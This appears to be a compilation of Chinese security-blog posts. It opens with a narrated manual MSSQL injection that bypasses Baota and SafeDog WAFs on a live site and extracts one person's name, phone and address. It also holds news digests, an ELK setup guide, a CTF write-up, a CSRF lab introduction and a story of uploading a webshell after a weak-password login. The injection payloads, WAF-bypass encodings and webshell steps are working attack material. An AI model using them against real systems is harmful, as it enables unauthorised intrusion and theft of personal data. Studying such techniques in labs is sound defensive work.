记一次面试bypass宝塔+安全狗的手注
前言
最近在准备找工作,有一家公司给我发来了这样一条消息,于是有了这篇文章.
本文涉及知识点实操练习:https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015060916565800001 (本实验以PHP和mysql为环境,简单展示了SQL的发生原理和利用过程,通过显错注入和盲注的对比,更直观展现注入的不同利用方法。)
因本文是bypass成功后,才写的可能会缺少一些图.(耗费本菜鸡半天时间,因为之前都是mysql搞的多,还有就是sqlmap一把梭.差点把传统手艺都丢了.)
大意了,没有闪
拿到目标后,我就迫不及待的直接打开
打开地址一看是报错的,我还以为任务是需要通过信息收集拿到shell,最后再拿数据.我还在想开局就送个信息泄漏?
最后折腾一番之后发现没什么突破口.回来再看之前的地址发现又能访问了.
大意了,没有闪
最后看到界面是这样的(能打开完全靠运气,特别是在晚上)
看到这个界面后,我就知道,原来是想测老夫的sql注入? 我当时心想不会用sqlmap一把梭就进去了吧!
注入点识别
随即我就先用'试试注入点
/1.aspx?id=1%27
继续试试and 1=1
/1.aspx?id=1%20%27and%201=1
好小子,居然有狗小小的一条就能难到我?打开burp,开始手注
bypass宝塔+安全狗
直接把请求改为post,试试垃圾数据填充能不能bypass
生成垃圾数据
好小子,还有个宝塔waf,看来垃圾数据填充已经不好用了
再试试分块传输bypass
还是一样(对分块传输没什么研究,和一些数据库特性结合应该还是可以用的,不是本文的重点)
接下来,开始fuzz
试试不带select
发现可以,继续试试,user和db_name()
这说明宝塔和狗都是对select 后面跟值进行拦截
我们继续试试联合查询union
不出所料还是一样,这两兄弟好搭档啊,换着来.由于本文重点是在学习手注入和bypass下面开始bypass,我这边打算写个payload混淆工具bypass
在写工具前我们得知道bypass的常用手法有哪些吧?
我这边大概整理了有如下几种
利用服务器特性
利用数据库特性
利用WAF特性
所以为了更好的bypass,我们就得了解对这些特性有一定的了解,因为我的当前目标是iis+aspx,那我们就得了解一下iis和mssql特性来进行bypass
iis特性
下面摘自 bypass大佬的waf攻防实战笔记
1、%特性(ASP+IIS)
在asp+iis的环境中存在一个特性,就是特殊符号%,在该环境下当们我输入s%elect的时候,在WAF层可能解析出来
的结果就是s%elect,但是在iis+asp的环境的时候,解析出来的结果为select。
Ps.此处猜测可能是iis下asp.dll解析时候的问题,aspx+iis的环境就没有这个特性。
2、%u特性(asp+iis和aspx+iis)
Iis服务器支持对于unicode的解析,例如我们对于select中的字符进行unicode编码,可以得到如下的
s%u006c%u0006ect ,这种字符在IIS接收到之后会被转换为select,但是对于WAF层,可能接收到的内容还是
s%u006c%u0006ect,这样就会形成bypass的可能。
3、另类%u特性(ASP+IIS)
该漏洞主要利用的是unicode在iis解析之后会被转换成multibyte,但是转换的过程中可能出现: 多个widechar会有
可能转换为同一个字符。 打个比方就是譬如select中的e对应的unicode为%u0065,但是%u00f0同样会被转换成为e。s%u0065lect->select s%u00f0lect->selectWAF层可能能识别s%u0065lect的形式,但是很有可能识别不了s%u00f0lect的形式。这样就可以利用起来做WAF的绕过。常见三个关键字(union+select+from)的测试情况:
s%u0045lect = s%u0065lect = %u00f0lectu --> %u0055 --> %u0075n -->%u004e --> %u006ei -->%u0049 --> %u0069o -->%u004f --> %u006f -->%u00bas -->%u0053 --> %u0073l -->%u004c --> %u006ce -->%u0045 --> %u0065-->%u00f0c -->%u0043 --> %u0063t -->%u0054 -->%u0074 -->%u00de -->%u00fef -->%u0046 -->%u0066r --
mssql特性
空白字符
Mssql可以利用的空白字符有(需要在字符前面加%):
01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
注释符
注释符可以用来代替空格,或者和--配合使用,--也可以配合%0a(注释加换行)
/**/--/**anything*/
特殊数值
一般用在注入点上
如1.1或者1E0这些
运算符
下面摘自 404大佬的MSSQL_SQL_BYPASS_WIKI
+ 加法运算- 减法运算* 乘法运算/ 除法运算,如果两个表达式值都是整数,那么结果只取整数值,小数值将略去% 取模运算,返回两数相除后的余数 & 位与逻辑运算,从两个表达式中取对应的位。当且仅当输入表达式中两个位的值都为1时,结果中的位才被设置为1,否则,结果中的位被设置为0| 位或逻辑运算,从两个表达式中取对应的位。如果输入表达式中两个位只要有一个的值为1时,结果的位就被设置为1,只有当两个位的值都为0时,结果中的位才被设置为0^ 位异或运算,从两个表达式中取对应的位。如果输入表达式中两个位只有一个的值为1时,结果中的位就被设置为1;只有当两个位的值都为0或
当我们了解完这些特性之后,直接开干,随即就打开了老夫的pycharm
下面直接省略测试过程的图片,大家可以手工测也可以用intruder来跑.fuzz是个漫长的过程,我这里只可以大家提供思路
先把空白字符和注释定义出来(经测试发现+也有同等效果)
1.先把所有的空格都用注释替换
2.对and和where进行处理,在它们前后随机加空白符,用来混淆这两个关键字
3.利用iis特性对下面这几个关键字某个字符用unicode编码替换
4.对下面这几个符合进行处理,
1.在某些函数会被拦截用+()来bypass
2.查询某某库的某某表如admin.user会被拦截,用+.来bypass
5.最后拓展下payload接收.最终代码如下
import random def bypass(payload): chars1 = ['%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0A', '%0B', '%0C', '%0D', '%0E', '%0F', '%10', '%11','%12', '%13', '%14', '%15', '%16', '%17', '%18', '%19', '%1A', '%1B', '%1C', '%1D', '%1E', '%1F', '%20']
已经打包上传github
地址:https://github.com/safe6Sec/bypassWAF
然后就可以愉快的手注了
mssql手注
从前期的来看,该注入点支持union注入和报错注入.我这边采用报错注入.
用union注入需要知道当前表有几列(和mysql一样用order by判断),还需要回显点
用报错注入主要是用top命令配合not in来进行注入
爆库(mssql默认有四个库,我们需要加个条件,dbid>4)
and (SELECT top 1 Name FROM Master..SysDatabases where dbid>4)>0
这样只是爆出第一个库,爆别的还需用not in来配合排除已知的表
用union联合查询结果如下(列数量要和当前表一致,没有的列用null占位)
union SELECT null,null,null,Name,null,null,null,null FROM Master..SysDatabases
从上面的数据可以看出,只有一个数据库
继续爆表
and (select top 1 name from a999.sys.all_objects where type='U' AND is_ms_shipped=0)>0
第一张表为a999,用not in排除这张表继续爆其他的
and (select top 1 name from a999.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('a999'))>0
以此内推
最后得了下面这些表
'dtproperties','a999','wap_album','wap_albumre','admin','wap_bankLog','wap_bbs','wap_bbs_MarkSix','wap_bbs_MarkSix_bet','D99_CMD','temp','wap_background'
直觉告诉我数据很有可能是在a999(从名字上判断)
直接爆字段,和爆表一样的操作
and 1=(select top 1 name from syscolumns whereid=(select id from sysobjects where name = 'a999') )
得到了这些字段
'id','siteid','airplaneid','airplanename','userid','username','num','tel','address','starttime','content','remark','addtime','state'
他们要的数据是:序号10的 那栏信息。包含 名字 电话 地址
开始跑数据
and 1=(select top 1 username from a999 where id=10)
然后继续把剩下的电话地址跑出来,上交收工.
fuzz真是挺废时间了,本文是在bypass成功后所写.过程耗费太多时间没截图,思路都告诉大家了.结合起来用即可.
或者会有大佬想说为什么不,写个tamper来跑,
最后感谢404和bypass大佬的文章,小弟受益良多.
总结
不要光说不做,实操才是真理
对waf的bypass也就那样,把规则搞清楚了就很简单,免杀也如此
union注入比报错注入香多了
网络安全日报 2021年01月26日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、勒索软件攻击了WestRock的 IT和OT系统
https://securityaffairs.co/wordpress/113843/malware/westrock-ransomware.html
2、挖矿僵尸网络DreamBus针对Linux服务器
https://securityaffairs.co/wordpress/113832/malware/dreambus-botnet-linux-servers.html
3、新Dovecat恶意软件针对QNAP设备
https://cyware.com/news/qnap-network-devices-targeted-by-new-dovecat-malware-950680eb
4、Matrikon OPC产品存在严重漏洞
https://www.securityweek.com/industrial-firms-informed-about-serious-vulnerabilities-matrikon-opc-product
5、CrowdStrike披露Windows NTLM漏洞详细信息
https://www.securityweek.com/crowdstrike-discloses-details-recently-patched-windows-ntlm-vulnerability
6、网络钓鱼者伪造Office 365密码过期报告盗取C-Suite凭证
https://www.securityweek.com/phishers-target-c-suite-fake-office-365-password-expiration-reports
7、Shazam应用漏洞暴露Android和iOS用户的位置
https://www.hackread.com/shazam-vulnerability-exposed-android-ios-users-location/
8、荷兰警方逮捕了两名非法出售COVID-19患者数据的人
https://securityaffairs.co/wordpress/113846/cyber-crime/covid-19-patient-data-sale.html
9、服装品牌Bonobos通知用户数据泄露
https://www.securityweek.com/clothing-brand-bonobos-informs-users-data-breach
10、SonicWall称攻击可能利用了SMA 100产品中的零日漏洞
https://threatpost.com/sonicwall-breach-zero-days-in-remote-access/163290/
威胁狩猎:基于ELK的日志监控
https://www.yijinglab.com/expc.do?ec=5e8b5d22-88eb-4061-a07f-80bd791f0b8d (通过本实验的学习,你能够了解主机安全软件监控原理,学会如何利用主机安全软件狙剑监控可疑进程,学会如何利用狙剑软件对本机进行注册表和文件的管理。)
0x、概述!
ELK Stack即以前的Elastic Stack,Elk Stack是Elastic公司专门为集中化日志管理设计的免费开源软件组合。它允许搜索、分析和可视化来自不同来源的日志。
如在ubuntu上安装配置ELK Stack,需要如下先决条件:
Ubuntu 20.04
最好使用Root 权限进行配置
0x1 内容目录
ELK Stack 组成部分
安装 Java 和所有依赖项
安装和配置 Elasticsearch
安装和配置 Logstash
安装和配置 Kibana
安装和配置 Nginx
安装和配置 Filebeat
配置 Linux 日志到 Elasticsearch
在Kibana中创建日志仪表板
监控 SSH 事件
0x2 ELK Stack 组成
1、Elasticsearch:Elasticsearch是一个基于Apache Lucene(TM)的开源搜索引擎,使用RESTful API,可以存储、检索数据。
2、Logstash:Logstash是一个开源的数据收集引擎,可以采集不同数据源的数据发送给Elasticsearch
3、Kibana:用于分析和可视化日志的 Web可视化平台
4、Filebeat:轻量级的日志收集和转发器,可以把数据收集后转发到Logstash或Elasticsearch
0x3 安装 Java 和所有依赖项
Elasticsearch是Java编写的程序,所以需要安装JDK,可以使用如下命令安装OpenJDK和其他一些所需的软件包。
sudo apt install -y openjdk-14-jdk wget apt-transport-https curl
然后导入Elasticsearch的公钥,添加apt软件源
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
添加软件源
0x4 安装和配置Elasticsearch
更新软件源
sudo apt update
然后安装(国内安装比较慢,请耐心等待)
sudo apt-get install elasticsearch
安装完后,开始配置Elasticsearch
Elasticsearh默认监听9200端口。为了安全,需要设置一下限制外网访问。使外部网络无法通过REST API访问数据和elastic集群。Elasticsearch的配置文件是elasticsearch.yml。修改它就行。
打开配置文件
sudo gedit /etc/elasticsearch/elasticsearch.yml
找到监听接口和端口进行修改
删掉前面的注释符号#改成如下的样子:
保存,然后启动Elasticsearch服务
sudo systemctl start elasticsearch
查看服务状态和验证是否已经启动
sudo systemctl status elasticsearch
curl -X GET localhost:9200
看到这个,就说明Elasticsearch启动成功了。
你也可以在浏览器里面访问https://localhost:9200查看
0x5 安装和配置Logstash
首先确保系统里面有openssl,然后安装Logstash
openssl version -a sudo apt install logstash -y
创建一个SSL证书用于保证Rsyslog 和Filebeat传输数据给Logstash时的安全性。
在Logstash的配置文件目录下创建一个ssl的目录,然后生成证书
sudo mkdir -p /etc/logstash/ssl cd /etc/logstash sudo openssl req -subj '/CN=elkmaster/' -x509 -days 3650 -batch -nodes -newkey rsa:2048 -keyout ssl/logstash-forwarder.key -out ssl/logstash-forwarder.crt
为了方便后续配置,我们可以修改一下/etc/hosts文件。把主机的ip配置一个主机名
然后我们需要配置三个文件,分别是用于从filebeat接收数据的filebeat-input.conf,用于过滤系统日志的过滤器配置文件syslog-filter.conf,以及用于输出数据到elasticsearch的output-elasticsearch.conf。
在logstash配置目录创建filebeat-input.conf文件
cd /etc/logstash/ sudo gedit conf.d/filebeat-input.conf
添加如下内容:
input { beats { port => 5443 type => syslog ssl => true ssl_certificate => "/etc/logstash/ssl/logstash-forwarder.crt" ssl_key => "/etc/logstash/ssl/logstash-forwarder.key" } }
然后创建过滤器配置文件syslog-filter.conf并采用grok过滤器,这个的作用就是让Logstash根据给出的规则提取数据。
sudo gedit conf.d/syslog-filter.conf
输入如下内容:
filter { if [type] == "syslog" { grok { match => { "message" => "%{SYSLOGTIMESTAMP:syslog_timestamp} %{SYSLOGHOST:syslog_hostname} %{DATA:syslog_program}(?:\[%{POSINT:syslog_pid}\])?: %{GREEDYDATA:syslog_message}" } add_field => [ "received_at", "%{@timestamp}" ] add_field => [ "received_from", "%{h
然后创建一个output-elasticsearch.conf配置文件用于将数据传输给elasticsearch。
sudo gedit conf.d/output-elasticsearch.conf
内容如下:
output { elasticsearch { hosts => ["localhost:9200"] hosts => "localhost:9200" manage_template => false index => "%{[@metadata][beat]}-%{+YYYY.MM.dd}" document_type => "%{[@metadata][type]}" } }
配置文件弄好之后,启动logstash服务看是否正常。
sudo systemctl start logstash sudo systemctl status logstash
没有报错,说明服务正常启动了。
0x6 安装和配置Kibana
安装Kibana也是通过apt即可完成
sudo apt install kibana
安装完成之后,我们设置一下kibana的配置文件
sudo gedit /etc/kibana/kibana.yml
主要是修改监听端口和地址,以及elasticsearch的地址
保存,然后启动kibana服务
然后你可以直接在浏览器中访问它
0x7 安装和配置Nginx
安装这个主要是给Kibana做反向代理的。
首先安装Nginx和Apache2-utlis
sudo apt install nginx apache2-utils -y
安装完成之后,创建kibana虚拟主机配置文件
sudo gedit /etc/nginx/sites-available/kibana
内容如下:
server { listen 80; server_name localhost; auth_basic "Restricted Access"; auth_basic_user_file /etc/nginx/.kibana-user; location / { proxy_pass https://localhost:5601; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection 'upgrade'; proxy_set_header Host $host;
给配置文件创建一个连接
sudo ln -s /etc/nginx/sites-available/kibana /etc/nginx/sites-enabled/
然后给访问Kibana Dashboard配置一个基础身份认证
sudo htpasswd -c /etc/nginx/.kibana-user elastic
然后测试Nginx配置文件并启动服务
sudo nginx -t sudo systemctl restart nginx
0x8 安装和配置Filebeat
下载filebeat然后安装
下载地址:https://www.elastic.co/cn/downloads/beats/filebeat
可以按照自己的需求进行下载
我们这里是安装在Ubuntu上,所以选择DEB版本下载。当然也可以直接用apt安装,前提是你在之前添加了Elastic的软件源。可以看官方指南进行添加软件源:https://www.elastic.co/guide/en/beats/filebeat/7.10/setup-repositories.html#_apt
sudo apt install filebeat -y
然后编辑filebeat的配置,配置文件的路径:
/etc/filebeat/filebeat.yml
首先把input部分改为true
然后修改Elasticsearch output部分
修改成如下配置:(根据你的实际情况进行设置)
修改Kibana配置部分:
修改完后保存。
然后初始化filebeat
sudo filebeat setup
复制之前生成的logstash-forwarder.crt证书到/etc/filebeat目录中
sudo cp /etc/logstash/ssl/logstash-forwarder.crt /etc/filebeat/
然后启动filebeat服务
sudo systemctl start filebeat
0x9 配置 Linux 日志到 Elasticsearch
配置rsyslog到Logstash,然后这些日志会自动传输到Elasticsearch
在配置日志到Logstash之前,我们首先需要配置Logstash到Elasticsearch之间的日志转发。
在/etc/logstash/conf.d目录下创建一个配置文件来设置到Elasticsearch之间的日志转发。
cd /etc/logstash/conf.d/ sudo gedit logstash.conf
配置文件的内容如下:
input { udp { host => "127.0.0.1" port => 10514 codec => "json" type => "rsyslog" } } # The Filter pipeline stays empty here, no formatting is done. filter { } # Eve
配置文件主要由三部分组成,input部分:定义日志从哪儿来,filter部分:日志过滤器,output部分:日志传输到什么地址。
然后我们重启一下logstash服务
sudo systemctl restart logstash
然后配置从rsyslog到Logstash日志转发,rsyslog可以使用模板转换日志然后进行转发。
为了让 rsyslog 转发日志,需要在/etc/rsylog.d目录中创建一个70-output.conf的配置文件。
cd /etc/rsyslog.d/ sudo gedit 70-output.conf
添加如下内容:
*.* @127.0.0.1:10514;json-template
意思是所有日志发送到127.0.0.1:10514并使用json格式的模板进行转换
我们需要创建一个json格式的模板文件
sudo gedit 01-json-template.conf
内容如下:
template(name="json-template" type="list") { constant(value="{") constant(value="\"@timestamp\":\"") property(name="timereported" dateFormat="rfc3339") constant(value="\",\"@version\":\"1") constant(value="\",\"message\":\"") property(name="msg" format="json") c
然后启动rsyslog服务
sudo systemctl start rsyslog
检查logstash监听端口是否正常:
ss -na | grep 10514
如果监听没成功,并且在日志中看到以下报错信息:
是因为配置文件里面存在语法错误,ELK软件对配置文件的语法要求比较严格,请仔细检查。
0x10 在Kibana中创建日志仪表板
在浏览器中打开Kibana界面
首先需要创建一个索引模式
然后找到Stack Management---Kibana中的Index Patterns
然后点击Create index pattern
输入logstash-*,然后点击Next step
然后时间过滤器我们选择@timestamp
然后点击Create index pattern
添加成功后是这样的:
点击回到Kibana的Discover中,在这里可以查询搜索你的数据
0x11 监控 SSH 事件
在过滤条件中,我们设置过滤条件为programename:sshd*
这样就可以看到sshd程序相关事件了。
0x12 更多参考资料
配置 SSL、TLS 以及 HTTPS 来确保 Elasticsearch、Kibana、Beats 和 Logstash 的安全 | Elastic Blog https://www.elastic.co/cn/blog/configuring-ssl-tls-and-https-to-secure-elasticsearch-kibana-beats-and-logstash
如何使用 Elastic Stack 监测 Nginx Web 服务器 | Elastic Blog https://www.elastic.co/cn/blog/how-to-monitor-nginx-web-servers-with-the-elastic-stack
网络安全日报 2021年01月25日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、网络安全公司SonicWall内部系统遭协同攻击
https://thehackernews.com/2021/01/exclusive-sonicwall-hacked-using-0-day.html
2、英国政府资助的笔记本电脑存在Gamarue病毒
https://www.hackread.com/uk-govt-funded-laptops-homeschoolers-gamarue-malware/
3、勒索软件攻击者发布苏格兰环境保护局文件
https://threatpost.com/attackers-publish-private-scottish-gov-files/163254/
4、英特尔未发布财务数据遭泄露
https://www.securityweek.com/chipmaker-intel-corp-blames-internal-error-data-leak
5、200万MyFreeCams用户数据在黑客论坛出售
https://securityaffairs.co/wordpress/113734/data-breach/myfreecams-data-breach.html
6、Edge添加了密码生成器删除了对Flash,FTP的支持
https://www.securityweek.com/microsoft-edge-adds-password-generator-drops-support-flash-ftp
7、特斯拉起诉前雇员涉嫌窃取敏感文件
https://securityaffairs.co/wordpress/113808/cyber-crime/tesla-sues-former-employee.html
8、KindleDrip漏洞–通过电子邮件入侵Kindle设备
https://securityaffairs.co/wordpress/113743/hacking/kindle-kindledrip-exploit.html
9、约会网站MeetMindful 228万用户数据在黑客论坛上泄漏
https://securityaffairs.co/wordpress/113803/uncategorized/meetmindful-data-leak.html
10、Drupal发布关键漏洞修复程序
https://www.bleepingcomputer.com/news/security/drupal-releases-fix-for-critical-vulnerability-with-known-exploits/
网络安全日报 2021年01月22日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Microsoft发布SolarWinds供应链攻击详细报告
https://www.securityweek.com/microsoft-details-opsec-anti-forensic-techniques-used-solarwinds-hackers
2、思科修复了SD-WAN,DNA中心,SSMS产品中的关键漏洞
https://www.securityweek.com/cisco-patches-critical-vulnerabilities-sd-wan-dna-center-ssms-products
3、SAP Solution Manager严重漏洞利用程序公开
https://www.securityweek.com/scanning-activity-detected-after-release-exploit-critical-sap-solman-flaw
4、Dovecat恶意软件针对QNAP NAS设备进行挖矿
https://securityaffairs.co/wordpress/113710/malware/qnap-dovecat-malware.html
5、网络钓鱼活动盗取的数千公司员工的凭据在线泄露
https://securityaffairs.co/wordpress/113705/hacking/phishing-stolen-pwd-google-search.html
6、FIN11攻击者正在使用Clop勒索软件
https://cyware.com/news/fin11-attackers-are-now-using-clop-ransomware-6be5cedc
7、黑客在论坛泄露7700万Nitro PDF用户记录
https://www.bleepingcomputer.com/news/security/hacker-leaks-full-database-of-77-million-nitro-pdf-user-records/
8、安全厂商发现三个发布到npm的恶意软件包
https://blog.sonatype.com/cursedgrabber-strikes-again-sonatype-spots-new-malware-campaign-against-software-supply-chains
9、数字货币交易所BuyUCoin 32.5万用户的敏感数据泄露
https://ciso.economictimes.indiatimes.com/news/key-data-of-over-3-25-lakh-indian-users-leaked-in-buyucoin-hack/80387325
10、网络诈骗者发送虚假工作机会以获取银行信息
https://www.vice.com/en/article/3an74y/scammers-are-sending-fake-job-offers-on-linkedin
网络安全日报 2021年01月21日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Oracle 1月的重要补丁更新包含329个新的安全补丁
https://www.securityweek.com/oracles-january-2021-cpu-contains-329-new-security-patches
2、Snort 3正式版发布
https://www.securityweek.com/snort-3-becomes-generally-available
3、Chrome 88修补了严重漏洞并不再支持 Flash
https://www.securityweek.com/chrome-88-drops-flash-patches-critical-vulnerability
4、 LuckyBoy恶意广告针对iOS,Android和XBox用户
https://www.securityweek.com/luckyboy-malvertising-campaign-hits-ios-android-xbox-users
5、加密货币交易所Livecoin在12月网络攻击后停止了运营
https://securityaffairs.co/wordpress/113650/digital-id/livecoin-halted-operations.html
6、网络安全机构介绍了Lazarus APT组织常用的工具
https://blogs.jpcert.or.jp/en/2021/01/Lazarus_tools.html
7、安全研究员发现视频会议应用多个漏洞包括Signal和FB Messenger
https://securityaffairs.co/wordpress/113657/hacking/signal-fb-messenger-logical-flaws.html
8、严重的Cisco SD-WAN漏洞可导致RCE攻击
https://threatpost.com/critical-cisco-sd-wan-bugs-rce-attacks/163204/
9、基于Golang的多平台新恶意软件ElectroRAT
https://cyware.com/news/electrorat-yet-another-golang-multi-platform-malware-12406d32
10、黑客在论坛上公开发布140万个Pixlr用户记录
https://www.bleepingcomputer.com/news/security/hacker-posts-14-million-pixlr-user-records-for-free-on-forum/
简单的CTF-从JS中获取flag
本文是一篇从蚁景网安实验室进行实验操作的笔记,一次非常简单地从JS中获取到flag的操作。
实验地址:https://www.yijinglab.com/expc.do?w=exp_ass&ec=ECID9d6c0ca797abec2016092313300000001&
1. 进入题目页(10.1.1.219:20123)看到一段话,还有一句很明显的提示语句“The evil url is the passkey”,翻译出来就是损坏的url就是flag。下面的英文有兴趣的也可以解读一下,对于解题没什么用,别问我怎么知道的。
页面没什么其他有用的信息了,我们直接看一下源码,看有没有什么发现。在页面源代码中发现了一段可疑的js代码
对代码进行解读,可以知道,这段代码的功能是对页面写入内容,这个内容由变量P表示,P的内容是多个ascii码,我们可以自己翻译,看这些ascii码的内容是什么,也可以直接在浏览器的console中进行运行,得到新的页面。
打开浏览器,访问题目页面,按f12打开开发者工具,我们将js代码粘贴到console中,回车进行运行,发现运行错误,这应该就是损坏的,将中间的空行等处理一下之后运行发现获得了一个新的页面。
然后会发现页面变成了空白,但是还是有一点不引人注意的地方:
翻看页面源代码,发现了一个隐藏的php页面:
我们访问这个php页面,发现有一个变量名为flag:
但是查看页面源代码中,并没有flag的内容,查看请求头部时,发现cookie中存在flag
接下来把这个flag提交到实验的答题中,这个实验就完成了,也是一次非常简单的获取flag。
网络安全日报 2021年01月20日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、FireEye发布新的开源工具以应对SolarWinds Hack
https://www.securityweek.com/fireeye-releases-new-open-source-tool-response-solarwinds-hack2、研究人员称VPNFilter恶意软件仍然存在于数百个网络
https://www.securityweek.com/hundreds-networks-still-host-devices-infected-vpnfilter-malware3、发现与SolarWinds 攻击有关的第四种恶意软件-Raindrop
https://www.securityweek.com/solarwinds-hackers-used-raindrop-malware-lateral-movement4、Malwarebytes称电子邮件系统遭SolarWinds供应链攻击
https://securityaffairs.co/wordpress/113628/hacking/malwarebytes-solarwinds-attack.html5、FreakOut僵尸网络利用近期3种危害Linux设备的漏洞
https://securityaffairs.co/wordpress/113606/cyber-crime/freakout-botnet.html6、研究人员发现Dnsmasq中多个漏洞影响数百万设备
https://thehackernews.com/2021/01/a-set-of-severe-flaws-affect-popular.html7、CoTURN修补VoIP系统访问控制绕过漏洞
https://portswigger.net/daily-swig/voip-vulnerability-coturn-patches-access-control-protection-bypass8、FBI警告窃取凭据的语音网络钓鱼活动
https://www.bleepingcomputer.com/news/security/fbi-warns-of-vishing-attacks-stealing-corporate-accounts/9、AnyVan披露数据泄露
https://www.theregister.com/2021/01/19/anyvan_confirms_digital_breakin_says/10、Microsoft 启用 Defender for Endpoint自动威胁修复
https://www.securityweek.com/microsoft-enables-automatic-remediation-defender-endpoint
Web安全-CSRF攻击实验
本实验以PHP和Mysql为环境,展示了CSRF攻击的原理和攻击过程。通过实验结果结合对攻击代码的分析,可更直观清晰地认识到Web安全里这种常见的攻击方式。
实验地址:https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015070816562700001
实验简介
实验所属系列:web攻防
实验对象:本科/专科信息安全专业
实验类别:实践实验类
预备知识
一、浏览器有关Cookie的设计缺陷
当前主流的Web应用都是采用Cookie方式来保存会话状态,但是浏览器在引入Cookie时却忽视了一项非常重要的安全因素,即从WEB页面产生的文件请求都会带上COOKIE。只要请求域与Cookie信息所指定的域相一致,无论是访问Web页面,还是请求图片,文本等资源,用户在发出请求时都会带上Cookie。下图抓包展示了我们在访问百度主页时所附带发送的Cookie信息。
Cookie的这一特性使得用户始终以登录的身份访问网站提供了便利,但同时,也方便了攻击者盗用身份信息执行恶意行为。
二、什么是CSRF
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。CSRF通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
用户登录并访问了一正常网站,登录成功后,网站返回用户的身份标识Cookie给用户。当用户访问到恶意网站时,恶意网站强制用户去向正常网站发送恶意请求。由于用户此时拥有正常网站的Cookie,所以就相当于攻击者盗用了用户身份,去访问了正常(目标)网站。
一次完整的CSRF攻击,需要受害用户需要完成两个步骤:
1.登录正常网站,并在本地生成Cookie。
2.在不退出正常网站的情况下,访问恶意网站。
三、HTTP GET和POST请求区别解析
URL全称是资源描述符,我们可以这样认为:一个URL地址,它用于描述一个网络上的资源,而HTTP中的GET,POST,PUT,DELETE就对应着对这个资源的查,改,增,删4个操作。GET一般用于获取/查询资源信息,而POST一般用于更新资源信息。
Get 方法通过 URL 请求来传递用户的数据,将表单内各字段名称与其内容,以成对的字符串连接,置于URL 后,如
http://www.xxx.com/index.php?username=liming&password=123456&数据都会直接显示在 URL 上,就像用户点击一个链接一样。
Post 方法通过 HTTP Post 机制,将表单内各字段名称与其内容放置在 HTML 表头(header)内一起传送给服务器端。
GET与POST方法实例:
GET /127.0.0.1?username=liming&password=123456 HTTP/1.1
Host: http://www.xxx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6)
Gecko/20050225 Firefox/1.0.1
Connection: Keep-Alive
POST / HTTP/1.1
Host: http://www.xxx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6)
Gecko/20050225 Firefox/1.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Connection: Keep-Alive
(----此处空一行----)
username=liming&password=123456
实验目的
1)了解Cookie在设计方面存在的缺陷
2)掌握CSRF攻击的原理
3)掌握Get和Post形式CSRF攻击脚本的写法
实验环境
两台Windows XP机器(分别安装有XAMPP集成部署环境),两台机器网络连通
一台机器部署正常网站(留言板)10.1.1.189
一台机器部署恶意网站 10.1.1.23
部署正常网站的主机环境中有Chrome浏览器(或其他方便抓包分析的浏览器或工具)
从弱口令到拿下站群服务器
声明:本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。
本文涉及知识点实操练习:https://www.yijinglab.com/expc.do?ec=ECIDfaf3-05da-4d49-9e11-72953b14f22c (通过DoraBox靶场系列闯关练习,了解文件上传漏洞的基础知识及如何进行绕过上传恶意文件。)
一、
前两天我一个朋友给我发来一个链接,说他做的站准备上线,问我能不能做下测试,既然是朋友,那肯定义不容辞,准备开始搞事情。
二、
1、先打开网站浏览一下,发现直接跳转到了登录页面,如下:
简单了尝试了下弱口令、万能密码和登录框xss,发现输入框对输入内容做了严格的过滤,非法字符一概不允许,果断放弃。
2、简单扫描了一下敏感目录,发现一个/adminx,果然这种开放注册的站都会给管理员提供一个专门的登录入口
(忽略这个 1.zip,那是我打包整站时留下的
尝试爆破,弱口令一波带走,进入后台,赶紧把喜讯报告给朋友,让他“惊喜”一下
3、寻找上传点
进到后台之后寻找上传点,发现系统设置处有修改站点logo的功能,先传个php小马试试水
我当场就惊了,你后台登录框过滤那么严格结果你这上传点就这就这??好歹做个本地校验啊,你让burpsuite面子往哪搁?
4、连接shell尝试提权
传了马之后使用蚁剑连接,首先就是查看服务器信息,这里有个小插曲,打开虚拟终端之后无论执行什么命令,返回结果都是 ret=127
应该是服务器上有什么安全软件做了过滤,使用蚁剑自带的插件进行bypass
成功绕过
